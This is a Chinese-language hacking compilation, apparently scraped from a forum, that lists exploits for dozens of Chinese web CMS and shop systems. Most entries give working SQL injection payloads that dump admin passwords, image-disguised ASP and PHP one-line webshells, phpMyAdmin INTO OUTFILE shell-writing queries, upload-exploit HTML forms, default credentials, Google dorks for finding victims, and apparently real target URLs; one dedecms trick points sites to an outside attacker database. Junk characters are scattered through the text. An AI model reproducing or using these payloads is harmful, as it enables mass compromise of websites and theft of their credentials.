启航企业建站系统 cookie注入漏洞通杀所有版本: ?: m; k9 `5 E
8 I+ p0 U6 [) V9 P3 `& I3 i& Q
直接上exploit:% K6 y0 f6 Y$ _5 V7 p, B1 I7 n5 u1 O* ~
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));) C- w! M Z# h9 N
test:http://www.tb11.net/system/xitong/shownews.asp?id=2100 B; o$ e0 z0 l! P$ G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 l4 Q. w/ N" U' B+ Y5 jAsprain论坛 注册用户 上传图片就可拿到webshell7 X! e; D+ z, b g
- x/ n4 z7 X" u e$ D; s8 u/ XAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。: d% o7 z7 l' c, q9 p
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
/ Q4 H. {& P) y2.gif 为一小图片文件,一定要小,比如qq表情图片1 A6 B) X ~( R5 D1 K9 ^
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用1 L, J+ p4 |! T% E' u! v+ Y
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了: A: i4 ` W, g5 b( r' A W! h
5.q.asp;.gif
$ ^) ~+ Q, O* [! Dgoogle:Powered by Asprain; Z" D, C3 \3 X. C
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) v3 j4 K0 V( y( H3 l* {* h6 [& \2 j2 o, {( e- h8 c
ShopNum1全部系统存在上传漏洞。( |* A/ v# q) T. {
: J" Q. L g- `; |" p7 I1 r首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。) |( J: X3 s* c C4 i7 l
按说明 提示登录后台。。* M- B; J8 V1 H1 K3 y+ e: }6 f
在后台功能页面->附件管理->附件列表% M! _4 r& V! N- u# W# b; M2 w
可以直接上传.aspx 后缀木马
* T, a7 z' X2 v( l$ ?http://demo.shopnum1.com/upload/20110720083822500.aspx! K# P( _+ E5 K. v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) A5 z; h* C9 u. P5 c% w. y4 N; N+ @1 M8 I) V+ H
牛牛CMS中小企业网站管理系统 上传漏洞
. c; g6 h0 d8 l& P$ f& u3 J5 d! I, e5 ^2 `8 K0 g
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。4 c5 |% P3 U9 A3 @& A) G
后台:admin/login.asp
1 f2 _3 e5 M' G/ T' j) Mewebeditor 5.5 Nday
5 E& t' F! V* a, i/ vexp:% | f) }- b$ h' b5 U S" m6 u
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?2 m" ]1 t y5 h6 m) m
<input?type=file?name=uploadfile?size=100><br><br>?
% U8 s% ]# ^# Z$ n; ]<input?type=submit?value=upload>?( H$ B1 B4 s( N! w9 ]" {# x
</form>* ^/ y. ?* L: L) F6 x( a
ps:先上传小马.
( m- u& k6 _# ^& c$ T5 c, Kinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
- E4 W# @4 U' I) U! U
' P$ x0 A* X- U% s- L" R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 u# v. m! G9 u7 K" X9 A4 O
1 h6 k) L ?: u* xYothCMS 遍历目录漏洞
2 T3 E& ?3 h( E
- G* t2 ]: U8 }8 c( w优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。5 H0 t9 G# O) }/ T* s9 w0 L, {1 k
默认后台:admin/login.asp
1 P6 S% z0 _% {' p* Z" `. D遍历目录:
2 Q1 u( G: g8 n" M) @) Zewebeditor/manage/upload.asp?id=1&dir=../* ~ T- y/ f+ R5 f, p: o
data:( ^7 Z( {7 L4 K* N, K, i
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
; T3 }! q9 W1 K% G$ M- n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: w" M$ g0 D/ z% f( U0 O' l
1 N/ b7 X# _5 ^2 n/ o2 o' e( v; U% X
Net112企业建站系统 1.0& {: u* s5 K! J
; n* Q& p+ j1 j; I( O' B源码简介:9 V# l" K- h. T+ |0 h8 j
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。 c( z5 c3 x* j; v- R1 L9 j
添加管理员:
g; p4 l% c" ^; Lhttp://www.0855.tv/admin/admin.asp?action=add&level=2
5 E( v- e2 R! d$ b t1 X其实加不加都不是很重要,后台文件都没怎么作验证。8 z: @) `9 L6 V
上传路径:
3 M- }: _& B3 p3 J9 Q7 thttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
/ A+ X* A5 d, m# U! C; bhttp://www.0855.tv/inc/Upfile.asp?Stype=22 ]; ?! R: l, w) U7 [
怎么利用自己研究。, l1 {1 }. N/ C V8 C: h
遍历目录:
$ p7 l7 `1 r Vhttp://www.0855.tv/admin/upfile.asp?path=../..
+ O- n ~; v$ Z- o6 Y* D+ G如:/ O4 m8 K _; X7 @
http://www.0855.tv/admin/upfile.asp?path=../admin
3 ~' n9 Y; o. Ghttp://www.0855.tv/admin/upfile.asp?path=../data
; D2 `' R3 @. B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 f- V6 R# l' u- a
/ w a8 j0 y3 M m' {1 L( i8 x易和阳光购物商城通杀 上传漏洞 a% H ~9 `. b1 v
8 U( n b4 R! a; g% I前提要求是IIS6.0+asp坏境。" c, w' v& Z' i1 E
漏洞文件Iheeo_upfile.asp + m K2 y- e& ?( b* c
过滤不严.直接可以iis6.0上传' d" W% W# I5 s2 m8 N; }, s
把ASP木马改成0855.asp;1.gif
9 K# K1 a* f8 s2 u( D5 o直接放到明小子上传7 P, X( c# K$ {& Q- X
Google搜索:inurl:product.asp?Iheeoid=
4 [! J/ U7 D8 ], N, t A--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 |" {8 p& C/ |+ \5 z0 J+ a
* S H. ?* T+ a, ?6 F
phpmyadmin后台4种拿shell方法
8 M0 N8 `! h% \& L( ?5 U* y2 {0 d- j$ Y8 N y" T9 z2 t
方法一:
) m6 H" O5 n/ {" Q& B$ GCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 ^3 R. Y8 M: c' O( N1 X/ R/ |9 JINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');! u! M0 T; q) \3 X H5 e1 ^
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';$ A- j( ?# _6 l. ?: n
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
! _ Z6 _' }* j3 b/ I- H4 G7 N一句话连接密码:xiaoma+ G- G# w+ e* [$ d
方法二:8 |' |8 N, U7 A1 ~
Create TABLE xiaoma (xiaoma1 text NOT NULL);7 x9 }! O+ m4 _" w
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
' K0 T6 c% p* k( w2 }select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
0 {* E9 U0 H/ ^6 F3 u# W! uDrop TABLE IF EXISTS xiaoma;
0 i, x1 U7 Q i) b. p方法三:
3 B/ S9 O/ `$ Y. d读取文件内容: select load_file('E:/xamp/www/s.php');8 Z/ X2 v. r, A3 ?3 }- x
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'4 u* y; o# N- P+ ^1 W
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 z1 P# N8 `* l, D( y7 w4 a方法四:
4 E9 C t- M* ]7 l9 Q7 Yselect load_file('E:/xamp/www/xiaoma.php');5 O7 }- p6 J$ I2 K7 G
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
- ]* U3 e/ D* C. n% w然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir4 `$ y8 Z. T5 p: x1 v/ W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! z- A# H8 \1 T5 d, H! O! G
8 c+ H8 Z4 N8 E; v' Y: I" |' o" R传信网络独立开发网站源码0day漏洞
; f( S# c0 ~& U) ~+ v8 g/ y0 l1 Y+ S+ K, m
后台system/login.asp
1 w( \& s3 j$ w8 N进了后台有个ewebeditor
7 Z' h- v( O9 j1 j+ t" S3 i! x r3 [Google 搜索inurl:product1.asp?tyc=9 e8 _' ~4 y8 j9 S5 G* Y
编辑器漏洞默认后台ubbcode/admin_login.asp
- p% Y- j3 v5 ]( J0 I; x" I' H数据库ubbcode/db/ewebeditor.mdb( E+ X8 k+ Z' F& _9 I* H
默认账号密码yzm 1111117 [- W9 C/ @: U& [1 W! z6 v# a' F
: x2 Y; q. T5 Z; S) ~ A
拿webshell方法
3 ^% j, m3 q* A4 P登陆后台点击“样式管理”-选择新增样式 % K u" i3 z4 C
样式名称:scriptkiddies 随便写 & O; E+ `. G' V+ ?
路径模式:选择绝对路径
: C n1 ]( E8 ] p g图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx Q! h2 y5 M# s* `7 w
图片类型比如就是我们要上传的ASP木马格式3 c) b0 x2 q2 A' J6 Q, v1 e# R" z
上传路径:/
6 x" R% Y+ [* r0 Q: C$ d7 |* ]% Y, [图片限制:写上1000 免的上不了我们的asp木马
/ k' S2 p) u: d$ y1 N上传内容不要写
9 G3 _8 @' \$ w b$ a2 @可以提交了 * q* e8 |7 D; ^7 @* E: c6 C
样式增加成功!
9 s& `4 u6 C* S0 [% _, Y8 u返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
1 }8 x+ k' J1 o% o) S# a" S2 M* A按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
( j9 K# F& G7 {; }8 D) h: o! }网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
. l u4 J2 }' Q/ V; D3 |上ASP木马 回车 等到路径% `5 o0 U4 w, d9 \/ c) v- _. h
3 r% c2 P6 q' k3 d; m4 m
后台:system/login.asp
9 k0 d: I, @6 }# f% eExp:
( j( k* i9 K2 w; u& @$ {5 Y+ ~and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
( D% i& _$ v0 r, x/ D* ]) p! v测试:6 Y3 B, Y) a* K' w8 b. v( E0 [7 c
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master" ]9 D% ^% c. u0 ~$ K
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master4 ^- z& a* ^8 e' F; }2 _" q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( s2 b( A& T8 \3 r
6 L( X! f4 d* G5 e$ v! Pfoosun 0day 最新注入漏洞( p3 U. ^( H0 y; _' I. z
; L8 |# q9 l, M! R
漏洞文件:www.xxx.com/user/SetNextOptions.asp# X! b3 Z$ b, e' o9 T$ p
利用简单的方法:9 Q E9 k5 m3 A5 c4 w
暴管理员帐号:- K% i) |! f8 U! ~) B. e# J
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
i8 X. P$ m2 @# e# `6 j5 }暴管理员密码:
6 w* q& ~8 _% A: a" Thttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
6 ]6 J. E. F$ L5 Z- v# B* H) @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ @6 C8 }; w; p( l" J# y: z
& j- M7 |. ^9 M7 X& {9 r4 P) }; M网站程序的版权未知!
% m* S% d: {/ Z7 \2 M T" M
! K4 n/ n) i! \ A; X: q默认网站数据库:+ I3 {. q" ] {) v) M1 v7 `
www.i0day.com/data/nxnews.mdb- y/ c) P5 y/ F
ewebeditor 在线编辑器:$ K) C! @8 P7 {4 u) P
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb( A0 F4 R3 Q- c Y* ~ ]
登录地址:ewebeditor/admin_login.asp
" z: s; o0 t" |0 z& }% C默认密码:admin admin
% A# @6 d5 b# `% w, }) D8 h登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data9 |0 [/ I! ?; o1 g( a
) {2 W8 h* f; v2 |8 C4 B& ^
Sql注入漏洞:
' t: Q5 ^& S: W4 Y: L" F! mhttp://www.i0day.com/detail.asp?id=12
- v3 R: O/ z, ] ?0 p7 {8 qexp:+ k8 D. R9 h& G* V' `
union select 1,admin,password,4,5,6,7,8 from admin
/ t* X0 K; S) G" {. f" t爆出明文帐号/密码( s) ?# g' y5 O- P* G) Y0 _
9 ~* \! r( L8 \. f6 V
上传漏洞:
& z0 \# X! P# L% M% r2 n- V后台+upfile.asp' a x8 ]% D9 j" i/ e& ^( Y
如:
7 e j$ B" Y4 |6 h* Lhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
/ d$ |5 }7 V$ z5 O" \shell的地址:网址+后台+成功上传的马3 G( \. o: o: T. f, s) J& t' `# `9 n
google:inurl:news.asp?lanmuName=/ ]: t2 E4 C1 }* \2 J- r
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. b! B" H3 ]# M0 `! o! L; v& N, Z5 S
dedecms最新0day利用不进后台直接拿WEBSHELL
3 m) m' Y/ J9 Z
' o( l7 d7 ?- }拿webshell的方法如下:6 u8 u( b3 s6 u) r- |7 v2 g
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.# @7 d& E1 n$ v3 Y1 U; I
前题条件,必须准备好自己的dede数据库,然后插入数据:
& y0 d/ b3 l- Pinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); * T% o) b3 _6 @$ v
( x6 R1 s. |9 Y* P- j. k6 ^: ]# x
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
8 y! ~" b1 J1 p5 p) t) f<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
6 @8 O" v) \( ]<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ l( O+ t2 v' f2 I8 k& q3 [
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />6 t- m1 S0 q" L i! r2 X+ m) m/ b9 a
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
0 d$ }( b1 e) C" C% X6 r8 v<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
, c9 e- r$ j9 ] I8 y( d% \+ e' {<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
: r! _1 A1 M% Q& a( ~<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" j [; i* N2 y
<input type="text" value="true" name="nocache" style="width:400">
+ |9 n# |4 w. a4 N/ g<input type="submit" value="提交" name="QuickSearchBtn"><br />
+ l/ C% k/ o- `) j</form>
6 d+ ^$ n8 D6 t<script>
" ?, ^. H% R7 H7 d! f4 t4 kfunction addaction(): f, |1 L$ |, y* u5 S
{
5 h6 t/ y) i1 |; f9 |! `2 Idocument.QuickSearch.action=document.QuickSearch.doaction.value;
2 g {# v7 { R |}0 Q' k6 {8 H" L1 i$ ~
</script>$ y: X/ @; k5 x: p, R4 h. B
-----------------------------------------------------------------------------------------------------------------------------------------------
0 r3 ^/ H/ _8 W; I$ b* p# ?5 L& ?% E
dedecms织梦暴最新严重0day漏洞3 o) ]& {0 K d7 k
bug被利用步骤如下:
! x0 F3 f% b0 V6 c8 ehttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: A2 ~8 H3 d$ [$ ]8 J3 [( [/ v
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。! L+ O. F' f9 E6 {
-------------------------------------------------------------------------------------------------------------------------------------------! t5 v- K q3 B* b5 b& M6 }% Z# u
1 b- C" s8 g7 P2 E( x. l多多淘宝客程序上传漏洞
1 p) ?8 u n1 P7 q: Z8 V5 A# L$ ~漏洞页面:
. m2 I* D- P3 }# R6 Gadmin\upload_pic.php- Y; i9 z! _* t; u; F0 O
传送门:
; l0 K7 g/ } s: x8 ~http://www.www.com/admin/upload_pic.php?uploadtext=slide1
2 b3 @) [3 O2 p( S# GPS:copy张图片马 直接 xxx.php 上传抓包地址!
6 A2 w' ~2 p& y8 K+ [7 C( ~- ]( a& \------------------------------------------------------------------------------------------------------------------------------------------------------
: \% C a7 e9 t# {" y; S9 z5 u* m$ {; t6 p4 `
无忧公司系统ASP专业版后台上传漏洞# _, f6 l' e% K; z
漏洞文件 后台上传: |2 q6 j8 E: B9 J- b: N) z
admin/uploadPic.asp$ L `8 P8 s6 t/ `
漏洞利用 这个漏洞好像是雷池的
& l9 S, ~( Q$ {6 ehttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 t# i3 r) p$ e4 p+ c5 N3 q
等到的webshell路径:: v8 \6 l: y: L3 D3 Y3 o+ Q+ K
/UploadFiles/scriptkiddies.asp;_2.gif, h+ L5 u8 b) @ X% n# R* a
---------------------------------------------------------------------------------------------------------------------------------------------------0 s1 G6 k- h" c g/ Q. p
7 Z: J( ]. ?# P* {5 `8 n3 Q2 j* V: p
住哪酒店分销联盟系统2010( G2 r! a7 `+ K3 t0 G
Search:5 Q3 D7 G, ?8 d6 E5 Z* Q& l+ d
inurl:index.php?m=hotelinfo
1 @& o5 B! Z5 H( A' Yhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin9 d" G6 {- D$ w
默认后台:index.php?m=admin/login
* {8 Y, E' C) W7 V5 m) j4 P, r--------------------------------------------------------------------------------------------------------------------------------------------------& l4 W. x0 n2 ?+ P8 ]
& N6 r8 ~+ B, i6 j
inurl:info_Print.asp?ArticleID=
- _+ C: R- G- P! i& A* b+ C. [后台 ad_login.asp
8 u5 P5 l& f. Z" d爆管理员密码:
. g/ ]( V0 ^3 f0 q7 {# T. _union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin9 P' A) S/ M, Q5 H- K; ?" k
------------------------------------------------------------------------------------------------------------------------------------------------------------" b/ o+ W" J+ m7 y& `! ^6 L) A
' O/ z- T% u" } o; m
搜索框漏洞!
0 j, P4 y5 b, M% y' j% D( k' d%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
) F, n; k8 S( J6 P& Z c--------------------------------------------------------------------------------------------------------------------------------------------------------3 G2 c" ~7 _' b! C& y: ]
5 Y! A% `5 ` s关键字:
! x5 M7 O. a, h4 k! \, Ginurl:/reg_TemletSel.asp?step=2' Y8 B. F! |7 D1 n$ n9 M, }
或者6 t& O3 _# S' D5 _ e
电子商务自助建站--您理想的助手
" M# ]! P3 z7 V+ v, d-------------------------------------------------------------------------------------------------------------------------------------------------4 I9 r: X* c; f1 l* U
" D2 V- D$ w! hiGiveTest 2.1.0注入漏洞9 O/ b% O: k0 e! r% M! S/ G
Version: <= 2.1.0
- z7 S& f5 i7 i/ J# Homepage: http://iGiveTest.com/
! W( n7 b$ c% g0 {; k- @谷歌关键字: “Powered by iGiveTest”1 m9 E* E, j+ k* K3 L" F
随便注册一个帐号。然后暴管理员帐号和密码/ C/ q: e' w( c. `
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (11 \/ F6 G: q5 m6 f% @
------------------------------------------------------------------------------------------------------------------------------------------------
9 D2 I: }% X" A; ?, T7 s+ e
9 ~7 m% q9 m% f5 k3 i+ BCKXP网上书店注入漏洞
. i# d5 @+ b! V3 I" n1 Q工具加表:shop_admin 加字段:admin7 |/ V0 A. G" `* g6 D4 b/ ^
后台:admin/login.asp 8 d% a1 A( c& }: f- d# g) M
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/4 R! F$ d' O% ^: w% D1 B% u; j) I
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
/ `$ w0 U# G0 X& G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& {# }2 {! ]% y% i
: P* q; h4 l5 P" W
段富超个人网站系统留言本写马漏洞3 a! g6 Q6 m7 B; p2 B# D6 @
源码下载:http://www.mycodes.net/24/2149.htm
$ G" S }. s& vaddgbook.asp 提交一句话。
$ `: W6 h/ G7 ]! v) h连接: http://www.xxxx.tv/date/date3f.asp
5 s* _6 |9 J) _. G( t4 Igoogle:为防批量,特略!" u: {7 Z) b- J$ q
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! C7 j* q7 z& C; X' D+ W. L Q8 k5 o4 I% a( O8 L3 ?7 J
智有道专业旅游系统v1.0 注入及列目录漏洞
2 Q+ W2 d- ^; v9 I) j默认后台路径:/admin/login.asp: ]9 W* F* T) K2 s1 d. ~
默认管理员:admin5 P# e+ v4 l8 i% L8 V
默认密码:1234567 J' n4 W8 O v* p
SQL EXP Tset:; g9 z& Z& i S9 d% B
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin4 y2 |3 G% r( y1 [: k: C
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" n o6 K2 _" j' Q% X) [4 G! T: K
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
, j- x! W$ M" V# [9 J# f0 m$ m' bEXP:
/ w$ C ]. n$ f<title>eWebeditoR3.8 for php任意文件上EXP</title>
, y/ O. n- \! G4 M<form action="" method=post enctype="multip
! i/ b9 ]4 X _! c9 K# [' e7 ?5 Xart/form-data"> 4 t- w! `% p' D8 E/ W
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
$ m2 t/ f' T0 L o+ F* GURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ! b7 {% ~3 M( i. c* r. [
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 5 c3 ]5 l6 f9 [, h* U
file:<input type=file name="uploadfile"><br> 2 v5 Z( N. s( \# T* e
<input type=button value=submit onclick=fsubmit()>
' e4 v7 X: k7 \</form><br> " \6 T0 Z9 X8 U0 x* q% G
<script> * y; Y( H! j8 O1 q* ?% z' T
function fsubmit(){ 8 l; e- s6 E* R) y3 c e" z Q
form = document.forms[0]; 3 G0 b9 C: ^3 k% |
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
2 T) a( z9 q1 J# ?" Q- yalert(form.action); , D. [) o( F1 m+ D; V
form.submit(); : ?4 O4 L+ H. q( c
}
$ e. P& `( c! r</script>) d9 e' p- p, }/ g$ k4 Y1 m
注意修改里面ewebeditor的名称还有路径。' L0 `% d( W- q, M/ Y4 p
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 U' h$ l1 G$ ^5 S1 \5 e- q8 _! U& L1 O- ?9 o
提交’时提示ip被记录 防注入系统的利用# d6 d% {( K% H7 G
网址:http://www.xxx.com/newslist.asp?id=122′/ K1 }! }- J# Q' h! e% G" Z& Q! Z3 ^
提示“你的操作已被记录!”等信息。$ K8 v' y2 \2 j: ~
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。" n5 z! e" T1 u
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 E+ E$ D0 [/ [+ ~1 _2 `
# ?$ e# B i- W1 ]% t9 B" w西部商务网站管理系统 批量拿shell-0day) T l9 I1 t+ o3 n( v* c C) d4 t: g
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
7 o' J! e& j, M% H! k, Y: ^8 [2 F1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛4 v5 [* t* Z. q/ R6 h# P& [
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合6 C- {# t! i% p8 O
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
: u2 _- Y4 j2 Z- L; P9 X---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 }/ t5 r5 i! R( Y) ~+ J; G/ e. a* p w/ R/ X3 t2 {9 m$ G; n
JspRun!6.0 论坛管理后台注入漏洞+ }* g# x# j- l: m
Q8 ~! X P0 O$ l
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:$ D# Z+ U4 a: e$ ?( u
JspRun!6.0 6 m$ J/ e" {1 v* P( y
漏洞描述:
& e& S; X* R! |+ Q3 z# cJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。3 M. M. U( [; a6 h
在处理后台提交的文件中ForumManageAction.java第1940行
1 K0 q* g6 ^1 a+ ~- C* r' w4 KString export = request.getParameter("export");//直接获取,没有安全过滤
8 q: O) j6 q" [& U( Eif(export!=null){
! [' ~( F$ ~2 x5 H$ b! }# e% {% m kList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
4 ]5 v5 e5 }, I7 wif(styles==null||styles.size()==0){6 i/ `6 K `' M% ?3 F: G8 r
<*参考
; y& D4 g ?) O4 z4 q. X3 |nuanfan@gmail.com8 I1 O! w6 L& p6 T5 A
*> SEBUG安全建议:
3 z8 [2 V9 S1 X. awww.jsprun.net
. e Y! M, ?& J; }' J' J' }(1)安全过滤变量export8 y- i. q, V: K2 `5 Y8 Q6 ^( s
(2)在查询语句中使用占位符
- o8 }- z# {8 V% |; n0 Y, E------------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Q, j' q J: t% ]( i) s0 d
4 i0 [, o R6 e, C: N V
乌邦图企业网站系统 cookies 注入
3 I5 E9 R) U5 d, i* y, o
2 u2 I2 o/ r4 D7 l$ @, C程序完整登陆后台:/admin/login.asp0 Y+ y+ d2 W& E, y% U
默认登陆帐号:admin 密码:admin888# }& f. `* V" m/ E, {
语句:(前面加个空格)
; r+ k/ J8 [+ m, x: X: Cand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
, ?- ]" {/ a! M9 R或者是16个字段:
2 R! Z: P. V- J" h4 P" Fand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
1 G/ I# N4 P, o1 Q% |; l: t' ~爆不出来自己猜字段。3 O: t3 @# {) `( ^" H
注入点:http://www.untnt.com/shownews.asp?=884 O, Y' u m& O' j) \* P! v" a# C2 z
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
3 {* h+ x, }+ H. X3 y# k) o5 @关键字:0 z) N2 y6 h1 ` m% v n
inurl:shownews?asp.id=
+ _2 y! d4 z% O4 z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! X* y- Y( V ~4 u0 w8 K& k1 ]: N7 m" B8 ` H4 Q) m" h& m' N
CKXP网上书店注入漏洞
R3 M, `" w$ `) v6 Z; w
' w1 @0 K9 I: H0 G; m工具加表:shop_admin 加字段:admin
0 z- ^4 z9 R3 `* f3 @: a后台:admin/login.asp
' W- e" N: w( m) ]. B登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/# w) {+ W0 X2 a: `3 q
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息; a5 M8 A9 Z: G$ U a; @8 ^) u2 B
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( Q4 Y6 ^; N* W- c) E1 N. C
- x" C. n/ |- s. o3 P% M9 C: S b
YxShop易想购物商城4.7.1版本任意文件上传漏洞
3 V. \& y) Z$ U$ F& x" x8 j
/ ]; ?0 |- w7 X; thttp://xxoo.com/controls/fckedit ... aspx/connector.aspx3 M3 S( a: D0 V6 u; @) ]0 i
